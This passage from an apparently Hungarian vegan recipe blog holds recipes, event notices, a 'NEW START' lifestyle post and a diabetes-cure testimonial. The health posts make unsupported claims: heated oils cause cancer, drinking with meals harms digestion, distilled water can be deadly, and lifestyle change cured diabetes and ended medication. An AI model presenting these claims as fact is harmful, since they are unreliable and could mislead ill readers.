szívnak. A cél, hogy gyúrható tésztát kapjunk. A tésztát 1 órát a hűtőben pihentetjük. Feltét: Ízlés szerinti zöldségek: paradicsom, paprika, hagyma, cukkini, stb. Növényi sajt: Soyaproduct, vagy Viofast termékek, utóbbi szójamentes! Paradicsomszósz: 3-4 db paradicsomot 3 evőkanál hidegen sajtolt oliva olaj 1 kk szárított bazsalikom, 1 kk oregáno 1 kk himalaya só 1-2 cikk fokhagyma késhegynyi nyírfacukor Ezt a paradicsomszószt, most ne főzzük, csak a felaprított paradicsomot turmixoljuk össze a többi hozzávalóval és adjuk hozzá a préselt fokhagymát. A tésztát lisztezett deszkán nyújtsuk ki 1 cm-vastagságura. Nem állítom, hogy könnyű vele dolgozni, de ha nem marad egyben nyomkodjuk bele a tepsibe. Öntsük rá a szószt, pakoljuk rá kedvenc zöldségeinket. Én a paprikát, hagymát, cukkinit szeletelő segítségével hajszálvékonyra szeleteltem. A szeletelt növényi sajtot pedig tegyük szintén a tetejére és előmelegített sütőben 180 C fokon süssük 20-25 percig.Fittanyuka
Vegán filmklub: Making the Connections (Összefüggések)
Vegán filmklubba hívlak Titeket! Időpont: November 11. vasárnap 16.00 Helyszín: Odeon Underground mozi Bővebb információ itt: http://www.facebook.com/events/289241837848264 Terítéken: Összefüggések (Eredeti cím: Making the Connection) Ahol a környezetvédelem, a természetközeli gazdálkodás, az állatok jogai, az egészséges életmód és a gasztronómia találkozik: a vegán életmód. Az angol The Vegan Society által készített fél órás videóban az élet különböző területein élő emberek beszélnek a vegán életmód előnyeiről. A magyar nyelvű feliratokat Bonifert Anna készítette:http://boldogvegan.blogspot.com/
Cékla tart tatin petrezselymes vinaigrette-tel
2012. szeptember 26. Zizi kalandjai
Micsoda cím... tart tatin, meg még vinaigrette is. Egyszerűen magyarra lefordítva: céklás pite petrezselymes ecetes öntettel. Extra a név, viszont egyszerűek az alapanyagok, könnyű elkészíteni és még a kezdők is bátran belevághatnak. A cékla elég mumus a zöldségek között idehaza. Leggyakrabban még mindig savanyúság készül belőle, esetleg saláta vagy céklalé. Pedig egy igazi vitaminbombával (A-, B- és C-vitaminban gazdag) állunk szemben, amely gazdag még káliumban, kálciumban, vasban, kénben és foszforban, kiváló vérképző hatású és még számos egyéb gyógyhatása ismert. Vannak megrögzött rajongói, akik már a chipstől kezdve a céklás kecsketúró mousse-ig, tzatzikiig, a mákos-céklás palacsintáig elég sok mindent készítettek belőle. Süthetünk belőle omlós, puha vegán céklás csokoládétortát, de a levelét sem érdemes kidobni, készítsünk belőle salátát vagy süssük bele egy quiche-be. Recept a Veg Every Day szakácskönyvből. Cékla tart tatin petrezselymes vinaigrette-tel Hozzávalók 2 főre: Tart tatinhoz : - 270 g leveles tészta (Tante Fanny-t használtam) - 350 g cékla (kb. 3 db), meghámozva, 2 cm vastag szeletekre vágva - 20-30 g vaj (vegánok használjanak olívaolajat) - 1 evőkanál napraforgó olaj - 2 teáskanál almaecet - 2 teáskanál nádcukor - só, bors Petrezselymes vinaigrette-hez : - 1 kis csokor petrezselyem, felaprítva - 1 kis fej vöröshagyma, felaprítva - 1 teáskanál dijoni mustár - 1 evőkanál almaecet - 4 evőkanál extra szűz olívaolaj - csipet nádcukor Nyújtsuk ki a tésztát, tegyünk rá egy kb. 20-24 cm átmérőjű edényt és késsel vágjuk körbe. Tegyük félre a kivágott tésztát a maradékkal együtt. Melegítsük elő a sütőt 180 fokra. (Ha van olyan serpenyőnk, amelyet betehetünk a sütőbe, akkor azzal dolgozzunk. Ha nincsen, akkor egy sima serpenyőben hevítsük fel az öntet hozzávalóit, a céklát tegyük egy kerek sütőtálba (kb. 20-24 cm átmérőjű legyen) és öntsük rá a vajas, ecetes szószt.) Egy serpenyőben hevítsük fel a vajat, adjuk hozzá az almaecetet, a nádcukrot, sózzuk, borsozzuk, keverjük meg, tegyük a felszeletelt céklát a tálba (ha kicsit több a céklánk, mint, ami belefér a tálba, tegyük félre és készítsünk belőle salátát) és öntsük rá a szószt. Tegyünk rá alufóliát és süssük 30-40 percig 170-180 fokon, amíg a cékla megpuhul. Vegyük ki a kerek tálat a sütőből, helyezzük a tetejére a kivágott tésztát, a maradékot pedig igazgassuk el szélnek, hogy teljesen befedje a cékla szeleteket. Tegyük vissza a sütőbe és süssük kb. 20 percig, amíg a tészta megemelkedik és aranybarnára pirul. Kivéve a sütőből, hagyjuk legalább 15 percet hűlni. Tegyünk egy nagy tányért a tetejére, bal kezünkkel tartsuk a kerek sütőtálat alulról, a jobb kezünkkel a nagy tányért felülről, majd óvatosan, de gyors mozdulattal fordítsuk a céklás sütőtálat a tányérra. Vegyük le a tepsit róla, locsoljuk meg a pitét a petrezselymes öntettel és tálaljuk azonnal.
Európában a magyar nők a legkövérebbek
2012. szeptember 20. Fittanyuka Blog
Ez egy szomorú tény! Elolvashatjátok véleményem a cikkben, hogy mi ennek az oka?! A megoldást is tudjuk: egészségesebb életmód - ételek, több mozgás. Hajrá Lányok, Legyünk Fittanyukák:)! Elolvasom a cikket! Fittanyuka
Csicseriborsó ragu - Magyarosan
2012. szeptember 13. Fittanyuka Blog
Érrendszerünk őre - a csicseriborsó Ha rendben akarjuk tudni az érrendszerünket, akkor a következőket mindenképpen érdemes kipróbálni, és rendszeresen fogyasztani a népnyelvben gyakran bagolyborsóként emlegetett csicseriborsót. Már az ókorban a görögök és a rómaiak is ismerték, és termesztették. Mi pedig újra felfedezzük, mint oly sok elfeledett hasznos táplálékunkat. Amellett, hogy az egészséges, reformtáplálkozás egyik legkiválóbb íz forrása dióra hasonlítható ízével, változatossá tehetjük vele étrendünket. Tipp: A csicseriborsó élelmirost tartalmának köszönhetően kiválóan alkalmas a székrekedés megelőzésére, illetve kezelésére. Ha rendszeresen fogyasztjuk, elérhetjük, hogy vér koleszterinszintünk csökkenjen, így kisebb az esély a szív-, és érrendszeri betegségek kialakulására is. Kutatások igazolják, hogy pektintartalma miatt csökkenti az étkezések utáni gyors vércukorszint-emelkedést, ezért a cukorbetegek számára is közkedvelt növény. Magas fehérjetartalma miatt gyakran fogyasztják sportolók, idősek is. Fogyókúrában magas rosttartalma miatt kedvezően hat a kilók csökkentésében. A lúgosító étrend egyik nélkülözhetetlen tápláléka. Karotin és E-vitamin tartalma figyelemre méltó. 100 g csicseriborsó energiatartalma 1292 kJ, azaz 314 kcal. Halkan jegyzem meg, hogy egyik nagy kedvencem és minden formában szeretem. A másik ajánlatom számotokra a csicseriborsó pástétom, vagyis a humusz, amiből nem győzök eleget készíteni! Ezt a ragut úgy készítjük, hogy a magyaros fűszereket használjuk, amelyek kitűnően illenek a csicseri diós ízéhez. Habár jellegzetes fűszere a római kömény, ezért a fűszerét most is megmutattuk neki:) Nem árt tudni, hogy a csicseriborsót egy egész éjszakára ajánlott beáztatni! Hozzávalók: ( 4 fő részére) 250 g száraz csicseriborsó 3 evőkanál kókusz olaj 1 db vöröshagyma 2 cikk fokhagyma 1 kávéskanál himalaya só 1/2 kávéskanál őrölt kömény 1/2 kávéskanál örőlt római kömény 3 kávéskanál őrölt édesnemes piros paprika örőlt rózsa bors ízlés szerint 2 db egész paradicsom 1 dl víz vegamix A csicseriborsót főzés előtti napon beáztatjuk egy éjszakára. Másnap átmossuk ( annyi vízben ami ellepi ) vegamixes, sós vízben puhára főzzük, lassú tűzön. Majd leszűrjük róla a vizet. A hagymát felaprítjuk és a kókusz olajon megdinszteljük, majd hozzáadjuk a felkockázott paradicsomot, együtt pároljuk. Hozzáadjuk a puhára főtt csicseriborsót, hozzáöntjük az 1 dl vizet és a fűszerekkel: paprika, kétféle kömény, összerottyantjuk, lassú tűzön. Amikor kezd besűrűsödni a ragu, hozzáadjuk a préselt fokhagymát és ízlés szerint még fűszerezhetjük. Mivel magas fehérjetartalmú étel és az ételtársításra is figyelünk, ezért egyértelműen zöldséggel együtt fogyasszuk. Amit még adhatunk köretként az az alacsony keményítő tartalmú és könnyen emészthető köles, amarant, hajdina. Fittanyuka
Sóba-vízbe krumplileves
Avagy a szegények eledele? Nem feltétlen gondolnám, bár általában olcsón hozzájutunk burgonyához, répához, a többi pedig plusz ízt ad a levesnek. Még gyerekkoromban hallottam ezt a kifejezést, és kóstoltam meg a barátnőim által ennek emlegetett levest. Már akkor megkedveltem, így ha eszembe jut és gyors levesre vágyom, pikk-pakk elkészítem és jól is lakunk vele. A recept: Hozzávalók: - 10 közepes szem krumpli - 5 szál répa - 2 szál fehérrépa - 1 karalábé - 1 zeller - 1 hagyma (elhagyható) - víz - só - piros fűszerpaprika (elhagyható) - őrölt köménymag - néhány gerezd fokhagyma - petrezselyemlevél (elhagyható) Elkészítés: A zöldségeket megpucoljuk, megmossuk, felaprítjuk. Két elkészítési mód áll előttünk: hagymával, vagy nélküle. Ha hagymával, akkor először a felaprított hagymát vízen megpároljuk, majd a zöldségeket rátesszük. Vagy kihagyva a hagymát egyszerűen egy fazékba tesszük a főzéshez előkészített zöldségeket. Megsózzuk, vizet öntünk rá - bőven. Majd elkezdjük főzni. Amikor már a zöldségek puhulni kezdenek, de még nem teljesen főttek meg, akkor a fűszereket, illetve az apróra vágott fokhagymát, petrezselyemlevelet beleszórjuk. Addig főzzük, míg a zöldségek meg nem főnek. Készíthetünk hozzá levesbetétnek nokedlit, vagy főzhetünk hozzá tésztát, de ezek nélkül is nagyon finom. Ha fűszerpaprikát nem teszünk hozzá, világos színű levest kapunk. Ez esetben egy kis növényi tejjel turbózhatjuk tovább. Aki szereti az intenzív ízeket, apríthat bele csilipaprikát. UI: Ha nem ódzkodunk tőle, magyaros fűszerkeveréket is szórhatunk bele egy keveset (akár a felsorolt fűszerek helyett is).
Rántott Robi szelet :-)
2012. augusztus 29. Mindennapi ételeink
Tegnap jártunk a Vegetárnál és -más dolgok vásárlása után - ezt kaptuk, kóstolóba. Magyarországon a Vegetár Kft. forgalmazza, egyébként cseh gyártmány: www.robi.cz oldalon olvasható róla bővebb infó. Szójamentes búzahúsról van szó tulajdonképpen. A bundát most Marianna tanácsára másképp készítettem. Hozzávalók: 1 tasak Robi-Szelet 1 dl szójaszósz 1 dl víz só, fokhagyma, borspótló -- 1 dl Yoja szójajoghurt só, fokhagyma 15 dkg finomliszt 15 dkg morzsa 10 dkg szezámmag 5-6 ek. 100% extra szűz olívaolaj Elkészítés: A szójaszószt, a vizet és az átpréselt fokhagymát összekevertem, és a szeleteket ebbe a páclébe tettem. Egy éjszakára a hűtőben értek össze az ízek. Majd ma hajnalban összekevertem a panírt: a Joya szójajoghurtba kevertem sót és átpaszírozott fokhagymát. A pácléből kiszedett Robi szeleteket előbb lisztbe, majd ebbe az öntetbe, majd szezámmaggal összekevert morzsába forgattam. Olívaolajjal kikent tepsiben sütöttem ki, kb. 15-20 perc alatt, egyszer forgattam.
Töltsd újra Sam! Gasztrohős versenykiírás
2012. augusztus 21. Répa Konyha
AKTIVISTA-, FOTÓ- ÉS VILÁGZÖLDÍTŐ PÁLYÁZAT A pályázat célja: Szeretnénk felhívni a figyelmet arra, hogy mennyi felesleges hulladékot termelünk a strandokon, fesztiválokon, bárokban, kávézókban, stb. elfogyasztott hűsítő italok elfogyasztása közben. Arra szeretnénk biztatni mindenkit, hogy vigye saját poharát és hagyjon fel a műanyag poharak használatával - és szeretnénk megtudni, hogyan reagálnak egy ilyen kérésre a vendéglátóhelyek. Mit kell tenned? 1) Vidd a poharad és a fényképezőgépet vagy kamerát, és fotózd le, hol töltetted újra! 2) Rakd fel a Felelős Gasztrohős facebook falára egy rövid leírással arról, hogy hol készült és milyen reakciót tapasztaltál, vagy küldd el nekünk e-mailben! 3) Biztasd a barátaidat, hogy szálljanak be a versenybe ők is! +1) Ne feledd: Ha éppen nincs is nálad a saját poharad, akkor is spórolhatsz a hulladékkal: a következő körben töltesd újra a poharat, amit először kaptál! A Pályázat kiírója: Felelős Gasztohős (Ökolúció Alapítvány); www.gasztrohos.hu A Felelős Gasztrohős célja az étkezéssel kapcsolatos - történjen az otthon vagy étteremben - felelős döntések ösztönzése. Kérdéseiddel nyugodtan fordulj hozzánk a jatek@gasztrohos.hu e-mail címen! A pályázat részvételi feltételei: 1) A pályázaton bárki részt vehet, aki 15. életévét betöltötte és magyarországi címmel rendelkezik, kivéve az Alapítvány kuratóriumi tagjait és azok családtagjait. 2) A pályázati anyagok az alábbi technikával készülhetnek: fénykép, amatőr videó, animáció 3) A benyújtott anyag ne sértsen semmilyen emberi jogi, etikai, vagy esztétikai elveket. 4) A pályázati anyagod benyújtásával hozzájárulsz, hogy azt az Ökolúció Alapítvány webes felületein (honlapok, facebook) felhasználja, és egyúttal lemondasz az ezért járó tiszteletdíjról. A pályázat határideje, pályázati anyag benyújtásának módja: A pályaműveket 2012. szeptember 30-án éjfélig várjuk. Az elkészült fotókat küldjétek el nekünk e-mailen (jatek@gasztrohos.hu) vagy töltsétek fel a Felelős Gasztrohős facebook falára (www.facebook.com/FelelosGasztrohos) a helyszín megjelölésével és egy rövid leírással arról, hogy milyen reakciót tapasztaltatok, mikor újra akartátok töltetni a poharatokat. A fotót és a leírást aztán osszátok meg saját facebook oldalatokon is, hogy minél többen kedvet kapjanak a játékhoz! (Az e-mailben hozzánk érkező pályázatokat feltöltjük a facebook oldalunkra.) További info: Gasztrohős blog
Provance-i lila burgonya
2012. augusztus 13. Mindennapi ételeink
Ismét itthon. Egy hetet Békés megyében töltöttünk, több mázsa dinnyét és paprikát szedtünk, apósomék gazdaságában. Nagyon jó volt mozogni, levegőn, növények között lenni. Ott is főztem, majdnem minden nap, csak nem volt nálunk fényképezőgép. Sok-sok finomságot termeltünk be a kertből, többek között az általunk ültetett veteményesből. Most 1 hónapig ezekből főzök majd. :-) Ma saját lila krumplit sütöttem, tepsiben. Nem nagy recept, inkább a színe miatt fotóztuk le. + Egy növényi sajt miatt, ami itt Magyarországon 6-800 Ft, de Romániában (apósoméktól fél órára) 250 Ft. Így vettünk három fajta ízesítésben: paradicsomos-bazsalikomosat, provance-i fűszereset és olívásat. Hozzávalók: 1 kg lilaburgonya 2 ek. 100% extra szűz olívaolaj 1 nagy kápia paprika 1 sárga húsú paprika 1 zöld húsú paprika 1 fej lilahgyma 10 dkg Vitofast növényi sajt 1-2 ek. provance-i fűszerkeverék Elkészítés: A krumplit kifőzzük, majd meghámozzuk és felkarikázzuk. Egy tepsit kiolajozunk, ebbe tesszük bele a felkarikázott krumplikat, megsózzuk. Közepes lángon, egyszer megforgatva kb. 20 percig sütjük. Ekkor adjuk hozzá a felkarikázott paprikákat, lilahagymát, és a provance-i fűszerkeveréket. Összesütjük (kb. 10 perc alatt), majd rászórjuk a lereszelt növényi sajtot. Frissen tálaljuk. Mi most paradicsomsalátával ettük (sárga, piros és zöld koktélparadicsom volt benne, a kertből:-).
NEW START életmód alapelvei I.
Az Eleki egészségközpont témával foglalkozó bejegyzéseim során többször említést tettem a "new start" életvitelről. Ez ugye a tényleg egészséges életmód alapelveinek angol nyelvű mozaikszava. New start annyit jelent, mint új kezdet. Nézzük, melyek azok a nyolc alapelvek, amelyek betartásával egészséges, minőségben jobb életben lehet részünk: N utrition = táplálkozás E xercise = testmozgás W ater = víz S unshine = napfény T emperance = önuralom A ir = levegő R est = pihenés T rust = hit, lelki egyensúly Válaszd az életet a helyes életmód alapelveivel. A világ sokat változott, de az alapelvek nem. Mindenki szeretne boldog lenni, de a boldogság egyik kulcsa az egészség. A 8 alapelv, a szó valódi értelmében valóban alapelv, és nem valami csodaszer, amitől az ember néhány nap alatt meggyógyul. Jelentősen javítani lehet az állapotunkat vele. Minőségi javulást lehet elelérni az alapelvek alkalmazásával. Fontos, hogy türelmet igényel. Mi viszont türelmetlenek vagyunk. Sokszor nem tudunk várni és gyógyszereket, vagy különböző csodaszereknek tűnő italokat, tablettákat alkalmazunk, próbálunk alkalmazni gyógyulásunkért... A következetes és türelmes betartása az alapelveknek - ez vezet hosszú távú eredményhez. Betartásuk által a szervezetünk bámulatos dolgokra képes. Azt gondoljuk, hogy csak mással történhet meg az, hogy cukorbeteg, rákos, szívbeteg, reumás lesz. De az egészség az nem valami véletlen dolog. Ezért dolgoznunk kell. Ne bízzuk a véletlenre. Ha valaki 2-3 évtized alatt elrontott valamit, azt nem lehet néhány hét alatt helyrehozni. Ha valaki különböző szerektől várja a javulást, még ha ideig, óráig meg is kapja, de az alapelvek elhanyagolása újabb és újabb problémákhoz vezet. Tüneti kezelésre képesek ezek a különböző készítmények, de a probléma okát nem oldják meg. Hiszen legtöbb esetben a betegségeink forrása a helytelen szokásainknak köszönhetők. Tudatosan odafigyelve az életvezetésünkre, hasznunkra szolgál. Testünk legjobb állapota érhető el az alapelvek betartása által. Táplálkozás A betegségek 40-60% a helytelen táplálkozásból adódik. Sok állati fehérje az első megemlítendő tényező. Csontritkulás is első sorban a helytelen táplálkozásnak köszönhető. A túlzott fehérje bevitel kivonja a csontokból a kalciumot, így gyorsabb csontritkuláshoz vezet. 100-110 gr fehérjét fogyaszt a magyar ember. Elég azonban 50-60 gr is. Elsőnek a gyomor, és a kiválasztó szervek sínylik meg, majd a többi szerv is hosszútávon. Hús, állati fehérje bomlásakor ugyanis képződnek olyan bomlástermékek, amelyek a szervezet számára károsak. Ezeket kiüríti a szervezet a bélcsatornán keresztül, vagy májba szállítja a véráramlat segítségével, miközben károsodnak az érfalak, szövetek, maga a máj is. Sok zsiradék esetében, nem csak állati zsírokról kell említést tenni, hanem növényi olajokról is. Magyarországon kialakult az a tendencia, hogy az állati zsírok káros hatásának tudatában átszoktunk a margarinokra, növényi olajokra. A hevítési eljárás során az olajok részecskéi gyökképző folyamatokban vesznek részt. A telítetlen olajláncok igen gyorsan reakcióba lépnek. Gyökös reakciókba, ami daganatos megbetegedésekhez vezet nagyon gyakran. Olajra szükség van. Növényi olajok fogyasztása javasolt, mértékletesen, és nem mindegy, hogy melyik olajféléket válasszuk. Egyszeresen telítetlen kötést tartalmaz az olíva olaj, amelynek fogyasztását orvosok is javasolják, kis mennyiségben. Azonban a margarinok és az úgynevezett főzőolajok szintén károsak a szervezetünkre. Ezért ha lehet az ételbe utólag hidegen sajtolt növényi olajat csepegtessünk, vagy válasszuk az olajok természetes forrását az olajos magvak fogyasztásával. Zsiradék másik káros hatása az elhízásban játszik szerepet. 1 gr zsír energiatartalma annyi, mint 1 gr olajé. Margarinfélék - transzzsírsavak - művi, gyári úton készítik őket. Szív és érrendszeri, illetve daganatos betegségek alakulhatnak ki rendszeres használatuk, fogyasztásuk során. Sok a cukor fogyasztása. Statisztika szerint napi 10 dkg cukrot fogyasztunk. Elhízás, fogszuvasodás, cukorbetegség - mind napjaink legelterjedtebb betegségei. Hazánkban jelenleg is fél millió cukorbeteget tartanak számon, plusz egy millió veszélyeztetett létezik, akiknél nem sok hiányzik a cukorbetegség kialakulásához. Egyre fiatalabbakat érint. Hiszen társadalmunk nagy része reggel-délben- este cukros leveket fogyaszt és rengeteget nassol. Az ember minden étkezést szeret édes ízzel lezárni. Ilyenkor gondoljunk arra, hogy a cukor felesleges kalória. Cukorral szemben viszont hiányt szenvedünk: vitaminokban, ásványi anyagokban. A helyes felszívódáshoz szükséges alapelemek. Ezek hiányoznak a finomított ételekből (fehér liszt, és belőle készült kenyér, finomított étolajok, stb.) Mivel az átlagember finomított, és nagyipari eljárás során készült ételeket fogyaszt leginkább, így vitaminokat és ásványi anyagokat nem megfelelően juttat a szervezetbe. Ha az étel nem tud felszívódni (fentiek hiányában), akkor zavart szenved a felszívódás. Az étel a bélcsatornába tovább halad, ott erjedni kezd, majd előbb utóbb vastagbél betegségek - mint pl. vastagbélrák alakulnak ki. A kevés rost fogyasztása is általános probléma. Rost dús táplálkozást teljes őrlésű gabonák étrendünkbe történő helyezésével érhetjük el. A rost olyan, mint az autó kereke. A táplálék ezek segítségével halad az emésztés útján. Fontos a szervezetben az egyensúly. Túl sok rost elzáródást okozhat, tehát nem kell állandóan korpát juttatni a szervezetbe. Ha mégis korpát eszünk, a zabkorpa jobb - vízoldható, csökkenti a koleszterin szintet. Búzakorpa ellenben felsértheti a beleket. De a rostfogyasztásunk lehetőleg ne csak abból álljon, hogy reggelire korpát eszünk. Ha pedig korpát fogyasztunk, legyünk mértékletesek. Növényi táplálék előnyben részesítése által több rosthoz jut hozzá szervezetünk. Helyesen alkalmazva a növényi étrendet, tudományos háttérrel a birtokunkban, nem vezet hiánybetegséghez. Testmozgás Izomzat segítségével képzelhető el a helyes testmozgás. Az izomzat annál jobban erősödik, minél intenzívebben munkavégzésre serkentjük. Heti legalább 2-3 alkalommal INTENZÍV testmozgást végezzünk! Nem takarítás, házimunkát, hanem elkülönített testmozgást. Az emberi szervezetünk mozgásra van teremtve. Ha nem mozgunk, leépülünk. Mozgás hatására erősödik a szívizomzat, az immunrendszer és javul a vérkeringés. Vérkeringés javulása következtében pedig a vérnyomást normalizálja. Csontrendszer állapotát javítja. Emellett a belső szervek anyagcseréje gyorsul, jobb lesz a gyomorműködés is. Az egész emberi testet megfiatalítja. Endorfin hormon termelődik általa. Reggel intenzív fizikai aktivitás után nem csak friss, üde lesz az ember, hanem az endorfin hormon - fájdalomcsillapító és nyugtató hatása jelentkezik. Reggeli mozgás után vegyünk egy rövid váltott fürdőt (vagy sima fürdés, zuhanyzás is jó) és a változásunk hatásos, észrevehető lesz. Szellemi munka végzése során szükség van a vérkeringés javítására. Az agyban ugyanúgy képződnek bomlástermékek, de ezek a hajszálereken nehezebben távoznak. Ezért kell a testmozgás a szellemi munka végzése után. Jobb, mint a pihenés. Kicseréli az agy vérhálózatát. Frissesség lép a helyére, agyfunkció javul általa. Stresszhelyzetre is ezért alkalmas egy aktív testmozgás, kirándulás szabad levegőn. Könnyebben kezeli a helyzetet az ember ez által. Friss vér jut ugyanis az agyba. Stressz hatására az agyban keletkező káros bomlásterméktől kitisztítja a testmozgás. Víz Legfontosabb anyag földünkön. Hozzá hasonló anyag nincs. Energiára is felhasználható. Gőzzel is lehet munkát végezni. Gépeket üzemeltetni, sportolni és gyógyítani is lehet vele. Megfagyásakor hőt ad le. Megfagyott vizek felett ezért melegebb van. Vadludak is a jégre mennek melegedni. Rejtett hő melegíti a vadludakat. Víz külső és belső használata. Belső vízhasználat: ne várjuk meg a szomjúság érzését. Ugyanis ekkor már vészreflexként jelez a szervezetünk (ellenben az étkezésnél ez nem igaz). A víztartalék ekkor már minimálisra csökken vissza. 2.5-3 l víz távozik a szervezetből naponta. Ezt pótolni kell vízivással elsősorban, másodrészt pedig ételekkel. Ezért is fontos, hogy napi 2 liter tiszta vizet fogyasszunk. A hajtól kezdve, az egészséges szemen át a belső szerveknek is létfontosságú a víz. Aki nem figyel oda a megfelelő napi vízmennyiség bevitelére, az megbetegíti a szervezetet. Fejfájás gyakorta alakul ki - a szervezet így jelzi, hogy nem kapott elég vizet. Emellett az ereknek és a vérnek ugyanúgy szüksége van vízre, mint a szemnek. Sokak látása azért is romlik, mert elhanyagolják a vízivást, emellett még cukros (vagy mesterségesen édesített) és állati fehérjékben gazdag ételeket fogyasztanak. A víz oldószer is - vitaminokat old és szállít is. Hőszabályozásnak fontos része. Az izomzat munkát végez, a test hőmérséklete megemelkedik. 43 fok felett veszíti el a test a működését. Fehérjék kicsapódnak. A párolgás mindig hűtéssel jár. Mikor fogyasszuk a vizet? Étkezés közben ne. Emberi test szilárd ételekre van beállva. A szilárd táplálékhoz képest a pépes táplálék rossz emésztést okozhat. Evés közbeni ivás - elpépesíti a bevitt élelmiszert - szervezetünk nem érti, miért tértünk vissza a pépes keverékre. Az emésztő enzimeket, nedveket is felhígítja az étkezés közbeni víz, így a gyomorműködés lelassul, az étel pedig erjedésnek indul. Cukros üdítő fogyasztása amúgy is erjedést okoz. Étkezés előtt fél órával nagyobb mennyiségű víz, és étkezés után 1-1.5 órával igyunk ismét vizet. Ebéd után már akár 2 dl folyadék fogyasztása is megzavarja az emésztést. Rossz közérzethez és rossz emésztéshez vezet. Szomjúságérzet rossz jele a szervezetnek. Félünk a víz szennyezettségétől. Desztillált vizet ne fogyasszuk hosszútávon - halálos lehet -, mivel nincsenek benne a szükséges ásványi anyagok. Víz külső hatása - jó hővezető - pl. nedves dunszt eltevésnél eredményesebb lehet, mivel könnyebben vezeti a hőt. Szauna - nedves gőz hatáson alapul. A gőz a bőrnek átadja a hőt. Nem javasolják 10-15 percnél tovább benn tartózkodni - gyorsan felhevíti a szervezetünket. Hideg vízzel gyorsan le lehet hűteni a szervezetet. A kétfajta hőmérsékletű víz váltott használata - pl. (láb)fürdő esetében - jelentősen megnövelheti az immunitást. Fehérvérsejtek működését is megnöveli. Aki esténként ilyen megoldást választ, kevesebbszer betegszik meg, valamint a migrénes fejfájás is váltott vizes fürdővel kezelhető. Persze nem egyszeri alkalommal. 3 perc meleg vizes zuhany - fél perc hideg vizes többször elvégezve jó hatással bír az egész szervezetre.
"Meggyógyultam a cukorbetegségből és elhagytam minden gyógyszeremet!"
Az Eleki Egészségközponttal kapcsolatos bejegyzéseim során több tapasztalatot is megosztottam azokkal, akik olvasták írásaimat. Most pedig egy olyan hölgy élményét publikálom, aki a kezdet kezdetén, az első turnuson már ott volt, mint gyógyulásra váró beteg, és azóta már életében szokássá váltak azok a lépések, amelyek minden ember életében egy minőségi javulást eredményezhetnek, ha ezt az ember is akarja és dönt mellette, ezt választja . Az alábbi történetet hallottam tőle. "20 éven keresztül egy gyermekfaluban gyermekeket neveltem. Ebben a magyarországi faluban egyedül álló anyukákra bíztak gyerekeket. Egy időben akár 5-6-7 gyermek is tartozott egy nevelőanyához. Hosszú idő eltelte után azonban úgy éreztem, egyre kevésbé tudok megfelelni az elvárásoknak, amik felém irányultak, és amiket saját magamnak szintén felállítottam. (Egy gyermeknek egy szülő is kevés, itt ráadásul egyedülálló anyaként neveltünk egyszerre több gyermeket.) Magamra maradtam, befelé fordultam. A nagy terhek az egészségemet is megtámadták. Depressziós tüneteket kezdtem észrevenni magamon, majd az anyagcserém is felborult. Örökös fáradtság is társult mindehhez. Végül a munkahelyemről elküldtek, amit nagy tragédiának éltem meg. Teljesen összeroppantam, bántott a velem történt igazságtalanság, és fájt, hogy elvesztettem azokat a gyerekeket, akik számítottak rám. Így teltek a hónapok az életemben. Sokkos állapotban voltam a munkahely elvesztése miatt. Ez annyira mélyen érintett, hogy nem tudtam könnyen feldolgozni. Bántott. Éjjel-nappal a gondolataimban volt és pusztított belülről ez az igazságtalanság, méltánytalanság. Aludni is hajnalban tudtam csak. Ez is inkább elszenderedés volt, sem mint, mély alvás. Iszonyatos alvászavaraim voltak tehát, így napközben erőm sem volt az életre. Orvostól orvosig jártam, mivel laboreredményeimben minden egyes tétel rossz volt. Cukorbetegség tünetei is előjöttek, rettegtem attól, hogy inzulinra állítanak, mert egyre magasabbak voltak a cukorvizsgálatok értékei. (Orvos által mért éhomi 8,5 és saját magam által mért 20 körüli érték is volt.) Végül az állapotom és eredményeim miatt a háziorvos is szakorvosokhoz küldött. Koleszterin, zsíranyagcsere, magas húgysav, mindenféle anyagcsere probléma kijött. Ekkor belgyógyász szakorvos gyógyszerekre állított be. Az orvos által javasolt táplálkozást folytattam. De mindez nem vezetett eredményre. Míg legutolsó alkalommal azt mondta az orvos, ha a következő egy-két hónapon belül nem rendeződik a cukor, akkor már csak az inzulin van hátra. Ekkor nagyon megijedtem. Családomban mindenki inzulinos cukorbeteg. Édesanyám napi 3 inzulinadaggal élt, látását elvesztette, érrendszere is tönkre ment. A hajlam tehát megvan bennem is, a stressz pedig nagyon hangsúlyos rizikótényező. A munkahelyemen az utolsó egy-két év megterheltsége feltűnően erős volt. Tulajdonképpen ez is okozta az anyagcsere folyamatok felborulását. Először csak azt éreztem, hogy nincs erőm. Ma már úgy látom - visszatekintve a történtekre, hogy a jó Isten kiemelte engem abból a munkából. Szervezetem is belebetegedett az utolsó néhány évbe, és az elbocsátás körülményeibe. (Bírósági ítélet során anyagi kártérítést kaptam, de ezzel az igazság nem állt helyre.) Mindenről lemondva, halni készült állapotba végül elmentem Elekre 2010 szeptemberében, ahol hatalmas csoda történt az életemben. Az egészséges életmódot, elveket addig is alkalmazni próbáltam, de nem volt igazán eredményes. Ott viszont már az első napon meleg szeretettel teli közösségbe csöppentem. Ahogy teltek a napok, egyre jobban kezdtem érezni magamat. A 8 alapelv (new start) gyakorlatát valósíthattam meg az életemben. Éreztem, ahogy visszatér belém az erő. Kezelőmmel elsétáltunk egy alkalommal a román határ felé. Csöndesen beszélgettünk, sétáltunk, a határnál leheveredtünk a fűbe, néztük a kéklő eget, és éreztem, hogy erőre kapok, hogy a jó Isten ott van, velem van és célja van az életemmel. Ez volt az a pont, amikor úgy éreztem, minden megfordult. Hétvégére jobbak lettek a labor eredményeim. Hazatéréskor pedig elláttak jó tanácsokkal. 10.000 lépés program - vagyis napi 10.000 lépést kellett naponta gyalogolnom. Lakhelyemen minden délben meglátogattam és megetettem édesanyámat (98) az idősotthonban. Oda is gyalog mentem, és haza is. Ezzel a 10.000 lépést biztos teljesítettem minden nap. A mozgás nagyon sokat segített. Az alvásánál is éreztem, ez jótékonyan hat. Jólesően el is fáradtam, amikor hazaérkeztem. Éreztem, hogy a vérkeringésem is beindult. Elkezdett megerősödni a szívizomzat a rendszeres, de mégis könnyű mozgás által. Másfél évig mindennap, míg élt az édesanyám, megtettem ezt a távolságot. Függetlenül hidegtől vagy hőségtől. Édesanyám halálát követően már a rendszeresség csökkent, de huzamosabb ideig ezt követően is éreztem a belső órámat, ahogy jelez, itt az idő, indulj a sétára. Napjainkban ahova csak tudok, gyalog megyek. Érzem, a szokásos mozgás hiányzik. Amikor Eleken vagyok, ott szintén jelen van az életemben, hiszen a programba van építve. Lelkileg is feldobott a mindenkori testgyakorlat, sőt pár hónap múlva a rettenetes fáradtságom is megszűnt. Pedig nehéz volt 